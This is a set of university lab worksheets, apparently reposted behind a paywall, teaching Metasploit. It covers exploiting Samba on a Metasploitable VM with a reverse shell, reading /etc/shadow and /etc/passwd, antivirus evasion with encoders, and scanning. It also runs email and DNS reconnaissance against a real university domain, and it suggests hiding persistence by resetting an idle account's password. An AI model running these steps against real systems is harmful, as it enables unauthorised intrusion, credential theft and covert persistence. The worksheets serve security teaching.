The attached documents need to be filled out.

The attached documents need to be filled out.


Network Attack Lab
Class: SEC6070
Name:
Date:
In this lab we will explore a Metasploit based network share exploitation.
1.
2.
3.
4.
5.
If Metasploitable isn’t already running launch the Metasploitable VM.
At the user logon prompt type: msfadmin
At the password prompt type: msfadmin
Type: ifconfig
Record the IP address here:
a. Paste screenshot here:-
6. Now switch to Kali.
7. Open a shell by clicking on the black box next to the word “Places”.
8. Let’s look for network share technologies in use. Type: nmap -A -p 139,445 x.x.x.x (replace
the x.x.x.x with the IP of Metasploitable see step 5.)
We’ve gathered information on the network share technology being used. Now let’s launch
Metasploit and use the relevant attack modules to exploit vulnerabilities in the network sharing
technology we’ve identified.
9. Launch Metasploit. Type: msfconsole
10. Let’s search Metasploit’s database for samba exploits. Type: search samba
11. Type: use exploit/multi/samba/usermap_script
12. Type: info
a. Paste screenshot here:13. Type: set rhost x.x.x.x (replace x.x.x.x with the IP of Metasploitable VM. See step 5)
14. Type: set payload cmd/unix/reverse
15. Type: set lhost x.x.x.x (replace x.x.x.x with the IP address of KALI.)
16. Let’s confirm the changes you made took. Type: info
a. Paste screenshot here:-
17. Type: exploit
a. Paste screenshot here:18. Type: whoami
a. Paste screenshot here:19. Type: pwd
a. Paste screenshot here:20. Type: cat /etc/shadow
a. Paste screenshot here:21. Type: cat /etc/passwd
a. Paste screenshot here:-
Mission accomplished!
Closing thought: “whoami” returned “root”. You could create an account and set the password or
you could use the “passwd” command to change the password on an account that hasn’t recently
been used. That way if the /etc/passwd or /etc/shadow file are examined no new accounts would
be identified. The possibilities are only limited to your imagination.
Once you have completed this worksheet please upload it via the link on Blackboard for grading
Introduction to Metasploit – A Tour
Class: SEC6070
Name:
Date:
What is Metasploit?
Metasploit is an open source framework for exploitation that has transcended its humble
beginnings and become a “penetration testing environment suite” – my interpretation. I say
this because you are now able to use Metasploit to accomplish any task in the penetration
testing phase and based on your findings you may choose a tool/methodology, modify an
existing tool/methodology, or create a new tool/methodology to accomplish your goal.
While most penetration testing options like Canvas have additional options and features, none
provide you with the freedom and flexibility that Metasploit does. So while Kali is a wonderful
Linux-based operating system loaded with tools, a pentester has everything he or she needs in
Metasploit. As you will soon learn in this course, Metasploit has reconnaissance tools
(discovery and vulnerability scanners), malicious code generators, evasion apps so your exploit
doesn’t get caught by IPS or antivirus, password attack tools, and many, many more.
PLEASE DON’T CONFUSE METASPLOIT (THE FRAMEWORK) WITH METASPLOITABLE (THE
VULNERABLE BY DESIGN OPERATING SYSTEM)
1.Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Launch a terminal (shell). (It’s the black box icon to the right of Applications, Places.)
3. Type: msfconsole
Wait patiently for Metasploit to load.
a. Once loaded paste your screenshot here: 4. Open another terminal and type: env
a. Paste your screenshot here: –
(View the PATH variable. When you attempt to execute a program Linux looks at all of the paths
in the PATH environment variable to find and execute the program. That’s why you may type
“msfconsole” and the program executes.)
5. If you visit the Rapid7 website (https://www.rapid7.com/) you will find you have the option
to register for notifications, support, and updates of Kali.
Rapid7 has moved away from using SVN for code management to Git.
For our purpose, here it doesn’t matter but if you enjoy working on the bleeding edge of distros
you may want to register and upgrade to the latest version.
a. Paste your screenshot here: –
6. Switch your focus back to the Metasploit shell. Look at the information under the banner
and answer the questions below about the various modules available.
6a. How many exploits does Metasploit have:
6b. How many auxiliary exploits does Metasploit have:
6c. How many post modules does Metasploit have:
6d. How many payloads does Metasploit have:
6e. How many encoders does Metasploit have:
6f. How many nops does Metasploit have:
Metasploit Modules Breakdown
I’ve defined Metasploit’s modules below.
Take the time to read them so you have a better understanding of their purpose and use.
Exploits – Pre-packaged malicious executables that takes advantage of a vulnerability to gain
access to a system and deliver a payload.
Payloads – Can be a variety of applications/configurations used to establish foothold on system
post-exploitation. Examples are reverse shells that call home or stagers for further exploitation
and persistence. Meterpreter is a particularly useful and commonly used payload shell.
Encoders – Obfuscates exploits and payloads so they can’t be fingerprinted by AV or IDS/IPS
definitions.
Auxiliary – Attack components such as DoS tools, buffer overflows, SQL injection apps, fuzzers,
and more.
Post – Automation modules for post-exploitation. Tools to further establish access on a system
or network like keystroke loggers and privilege escalators.
NOPs – NOP sled tools such as buffer overflow reference material for custom NOP sleds. For
simplicity’s sake we’ll say NOP sleds tell a processor to do nothing for a specified number of
clock cycles, thereby increasing the chances of your code executing successfully.
With that brief introduction behind us let’s learn by doing.
*You may want to maximize your terminal to full screen.
7. Type: help (Notice the list of commands available to you in Metasploit.)
a. Paste your screenshot here:-
8. Type: show exploits (Wait patiently for the Metasploit database to be queried and print the
results to your terminal.)
a. Paste your screenshot here:-
b. Notice the format: Name, Date, Rank, Description
c. What is the date of the “windows/http/sonicwall_scrutinizer_sqli” exploit?
d. What is its rank?
e. What is its description?
9. Encoders allow you to encode your payload so it doesn’t trigger antivirus or IDS tools like
McAfee’s HBSS.
This is very important to know and understand because most AV and IDS tools aren’t going to
catch your payload if you encode it.
a. Type: show encoders
b. Paste your screenshot here:c. Find and document an encoder of your choice here:
10. Payloads are the deliveries we will make to the system we are exploiting.
a. Type: show payloads
b. Paste your screenshot here:-
c. Find and document a payload for the Mac OS here:
a. Paste your screenshot here:-
11. We will use auxiliary modules quite a bit. There are a variety of community provided
penetration testing tools located here.
a. Type: show auxiliary
b. Paste your screenshot here:-
c. Does the auxiliary module contain scanners?
d. If so list them here :Now let’s get down to business and pretend we are professional penetration testers
researching a strategy to gain access to an industrial control system network such as a water
treatment plant.
12. We need to find a Windows SCADA exploit.
a. Type every word after this colon: search windows/scada
b. Paste your screenshot here:-
13. Let’s learn more about a particular module we found in our search results to confirm it will
be useful to us.
a. Type: info windows/scada/moxa_mdmtool
b. Who provided this exploit?
c. What are the options available for this exploit?
d. What references are available?
e. What does the description tell us this module does?
14. This may be the exploit we need to compromise the system.
a. Type: use windows/scada/moxa_mdmtool
b. Paste your screenshot here:-
c. Type: show payloads
d. Document two payloads you would might use that are available for this exploit:
e. Paste your screenshot here:-
15. Type: show advanced
a. These advanced options, for the most part, won’t normally be changed by you. You will want
to change them in some cases though. Scroll down to the SSL option. It’s currently set to false. If
you were running a reverse shell out of a network you may want to enable SSL not only to
potentially hide your activity but to also protect your client. The last thing you want to do
expose the client’s data to a third party because you transferred it in clear text over the
internet.
16. Type: show options
a. Paste your screenshot here:-
b. These are the setting the exploit currently has.
17. Type: info
a. Paste your screenshot here:-
17. Type: help
a. Paste your screenshot here:-
b. What command would you type to verify a system is vulnerable to this exploit?
c. What command would use to execute the exploit?
19. Type: exit
Now let’s take a look at how Metasploit’s file system is organized.
20. Type: cd /usr/share/metasploit-framework/modules
a. Type: ls (You should recognize the high level organization.)
b. Paste your screenshot here:-
21. Type: cd exploits
a. Type: ls
b. Paste your screenshot here:-
(As you can see, you may drill down in each folder to view available tools Metasploit offers.
Although this isn’t necessary, it is good to understand how the Metasploit is organized for
troubleshooting modules.)
You’ve gained a basic understanding of Metasploit’s organization and how to explore this
popular open source penetration testing tool suite. We’ll gain a higher level of understanding
and take part in a more advanced use of Metasploit in subsequent labs.
Please upload this worksheet via the link provided in Blackboard
Metasploit Reconnaissance Lab
Class: SEC6070
Name:
Date:
In this lab we will be doing information gathering with regards to email addresses within the
Wilmu.edu domain
1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop.
3. Type: msfconsole
We’ll start by performing reconnaissance of a potential target.
We’ll run an email reconnaissance module against wilmu.edu for demonstration purposes.
4. Type: use auxiliary/gather/search_email_collector
5. Type: set DOMAIN wilmu.edu
6. Type: set OUTFILE /tmp/results.txt
7 Type: info
a. Paste your screenshot here:-
8. What search engines is search_email_collector using?
a. Paste your screenshot here:-
9. Type: show advanced
a. Paste your screenshot here:-
10. Why might you use a proxy when running search_email_collector?
ANSWER:
10. Type: run
a. Paste your screenshot here:11. Your results were already printed to the screen but what if you move on to another pen testing
activity?
a. Type: cat /tmp/results.txt
b. Paste your screenshot here:-
As you can see, your results have been recorded to a text file for later referencing.
12. Type: ls /usr/share/metasploit-framework/modules/auxiliary/gather
a. Paste your screenshot here:-
13. What other interesting information gather tools are there?
a. List one of the tools you are interested in and why.
ANSWER:
Now that we know a little bit more about wilmu.edu we’ll run a DNS
reconnaissance module against wilmu.edu.
14. Type: back
15. Type: use auxiliary/gather/enum_dns
16. Type: info
a. Paste your screenshot here:-
17. Look at the options that are set to true by default. enum_dns will try a zone transfer using
ENUM_AXFR. enum_dns will also search for common srv records such as such as ftp, http, smtp, ldap,
etc, using ENUM_SRV. ENUM_STD is also set to be used by default. It will search for standard DNS
records such as start of authorities (SOAs), name server records (NSs), and A records (aka hosts). As you
can see, enum_dns is more powerful and aggressive than dns_info.
18. Type: show options
a. Paste your screenshot here:-
19. Type: show advanced
a. Paste your screenshot here:-
b . What options would you use if you had a strategy, such as a low and slow attack that won’t get you
noticed?
ANSWER:
20. Type: set DOMAIN wilmu.edu
21. Type: run
a. Paste your screenshot here:-
22. What information was retrieved?
ANSWER:
23. Let’s explore more enum_dns options.
a. Type: set ENUM_TLD true
24. Type: run (This could take quite awhile to complete.)
a. Paste your screenshot here:-
b. How many TLDs does enum_dns search?
ANSWER:
Be careful when using this option. You might find spoofed sites that have been set up to look like the
original and then get hit with exploits suites like the Black Hole Exploit Kit.
25. Type: show options
a. Paste your screenshot here:-
b. What does ENUM_RVL do?
ANSWER:
26. What does ENUM_BRT do?
ANSWER:
a. Type: ls /usr/share/wordlists
b. Paste your screenshot here:-
These are not files you would want to cat or gedit. They are enormous wordlists used by Metasploit for
various brute forcing purposes.
We’ve done some basic but effective reconnaissance using Metasploit. We’ve discovered email
addresses and servers belonging to Wilmington University. There are many reconnaissance tools
available to you such as Maltego. Maltego is a highly effective reconnaissance tool that also searches
social network sites.
Once completed please upload this worksheet to Blackboard by the link provided for grading
Metasploit Scanning Lab
Class: SEC6070
Name:
Date:
1. If your VMs aren’t already running then open VMware and launch the Kali VM and login as root with
your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the
word “Places”.
3. Type: msfconsole
4. Open another instance of VMware Player and launch the Metasploitable VM.
5. At the user logon prompt type: msfadmin
6. At the password prompt type: msfadmin
7. Type: ifconfig
a. Paste your screenshot here:-
b. This IP address becomes your RHOST (Remote Host)
8. Record the Metasploitable VM IP address here:
Metasploit has numerous scanners located in various places. Let’s become
familiar with how to find and identify the scanners we need. Not all scanners are
built alike. Some are very limited but very good at what they do while others are
broader in functionality and applicable in many instances.
Switch to you Kali VM and type “back” if you currently have a module loaded from
a previous lab.
9. Repeat step 2 and open an additional shell and type:
ls /usr/share/metasploitframework/modules/auxiliary/scanner/portscan
10. These are just a few of the built in port scanners Metasploit has to offer.
a. What port scanners are available?
b. Paste your screenshot here:-
11. Lets pick one and list the options and advanced options.
a. Switch to your Kali VM and type: use auxiliary/scanner/portscan/xmas
b. Type: show options
c. Paste your screenshot here:d. Type: show advanced
a. Paste your screenshot here:12. Type: back
13. Switch to the other shell (Not Metasploit.) and type:
ls /usr/share/metasploit-framework/modules/auxiliary/scanner/discovery
a. Paste your screenshot here:14. Notice we have more discovery tools.
a. List a tool and what it does.
b. Paste your screenshot here:15. Switch back to your other shell and type: use auxiliary/scanner/discovery/arp_sweep
a. Type: show options
b. Paste your screenshot here:-
c. Type: show advanced
d. Paste your screenshot here:-
16. Let’s search for more scanners.
a. Type: search type:auxiliary scanner
If you have trouble reading the output make sure your shell is maximized as well as your instance of
VMware.
b. Paste your screenshot here:-
17. What scanner may I use to brute force Outlook Web Access logins?
a. Type: search type:auxiliary outlook
b. Who wrote the module? Type: info
c. Paste your screenshot here:d. Type: info auxiliary/scanner/http/owa_login
e. Paste your screenshot here:-
18. What is the pcanywhere_login module good for?
a. Type: search type:auxiliary pcanywhere_login
b. Paste your screenshot here:-
c. Type: info auxiliary/scanner/pcanywhere/pcanywhere_login
d. Paste your screenshot here:-
Now let’s learn how to use the “info” command to gather information about modules.
19. Type: info auxiliary/scanner/mssql/mssql_ping
a. What does this module do?
b. Paste your screenshot here:-
Now let’s look at everyone’s favorite scanner Nmap. Nmap is a tool every pen
tester, system administrator, network administrator, etc, should be familiar with.
*If you currently have a module loaded type: back
20. Type “nmap”. Notice the exhaustive output. The switch syntax is given along with a description of
the command.
21. Type: nmap -sT x.x.x.x (x.x.x.x. is the IP address of the Metasploitable VM.)
a. What were some of your findings?
b. Paste your screenshot here:-
Now that we’ve used Nmap to find and scan a host let’s see if we can connect.
22. At the msf console type: connect help
a. Paste your screenshot here:-
View the options.
23. To verify a port is open on your target and you can connect to it type “connect -z x.x.x.x 21”
This will connect you to the FTP port on your target system, if the FTP service is running.
a. Go ahead and see if you are able to connect to the target using the above command. What are the
results.
b. Paste your screenshot here:24. Now that you know the FTP port is open you can search for exploits.
a. Type: search platform:linux type:exploit ftp
b. Paste your screenshot here:-
c. List two exploits.
d. Paste your screenshot here:-
We’ve explored scanning with Metasploit by searching for multiple scanner
modules, loading them, and exploring their functions. We also used an industry
favorite, Nmap, to target our victim VM. We connected to an open port to
confirm connectivity and then looked up available exploits in the Metasploit
database. In the labs ahead we’ll be using the information we’ve gathered to
continue looking up exploits and leveraging them against vulnerabilities.

Purchase answer to see full
attachment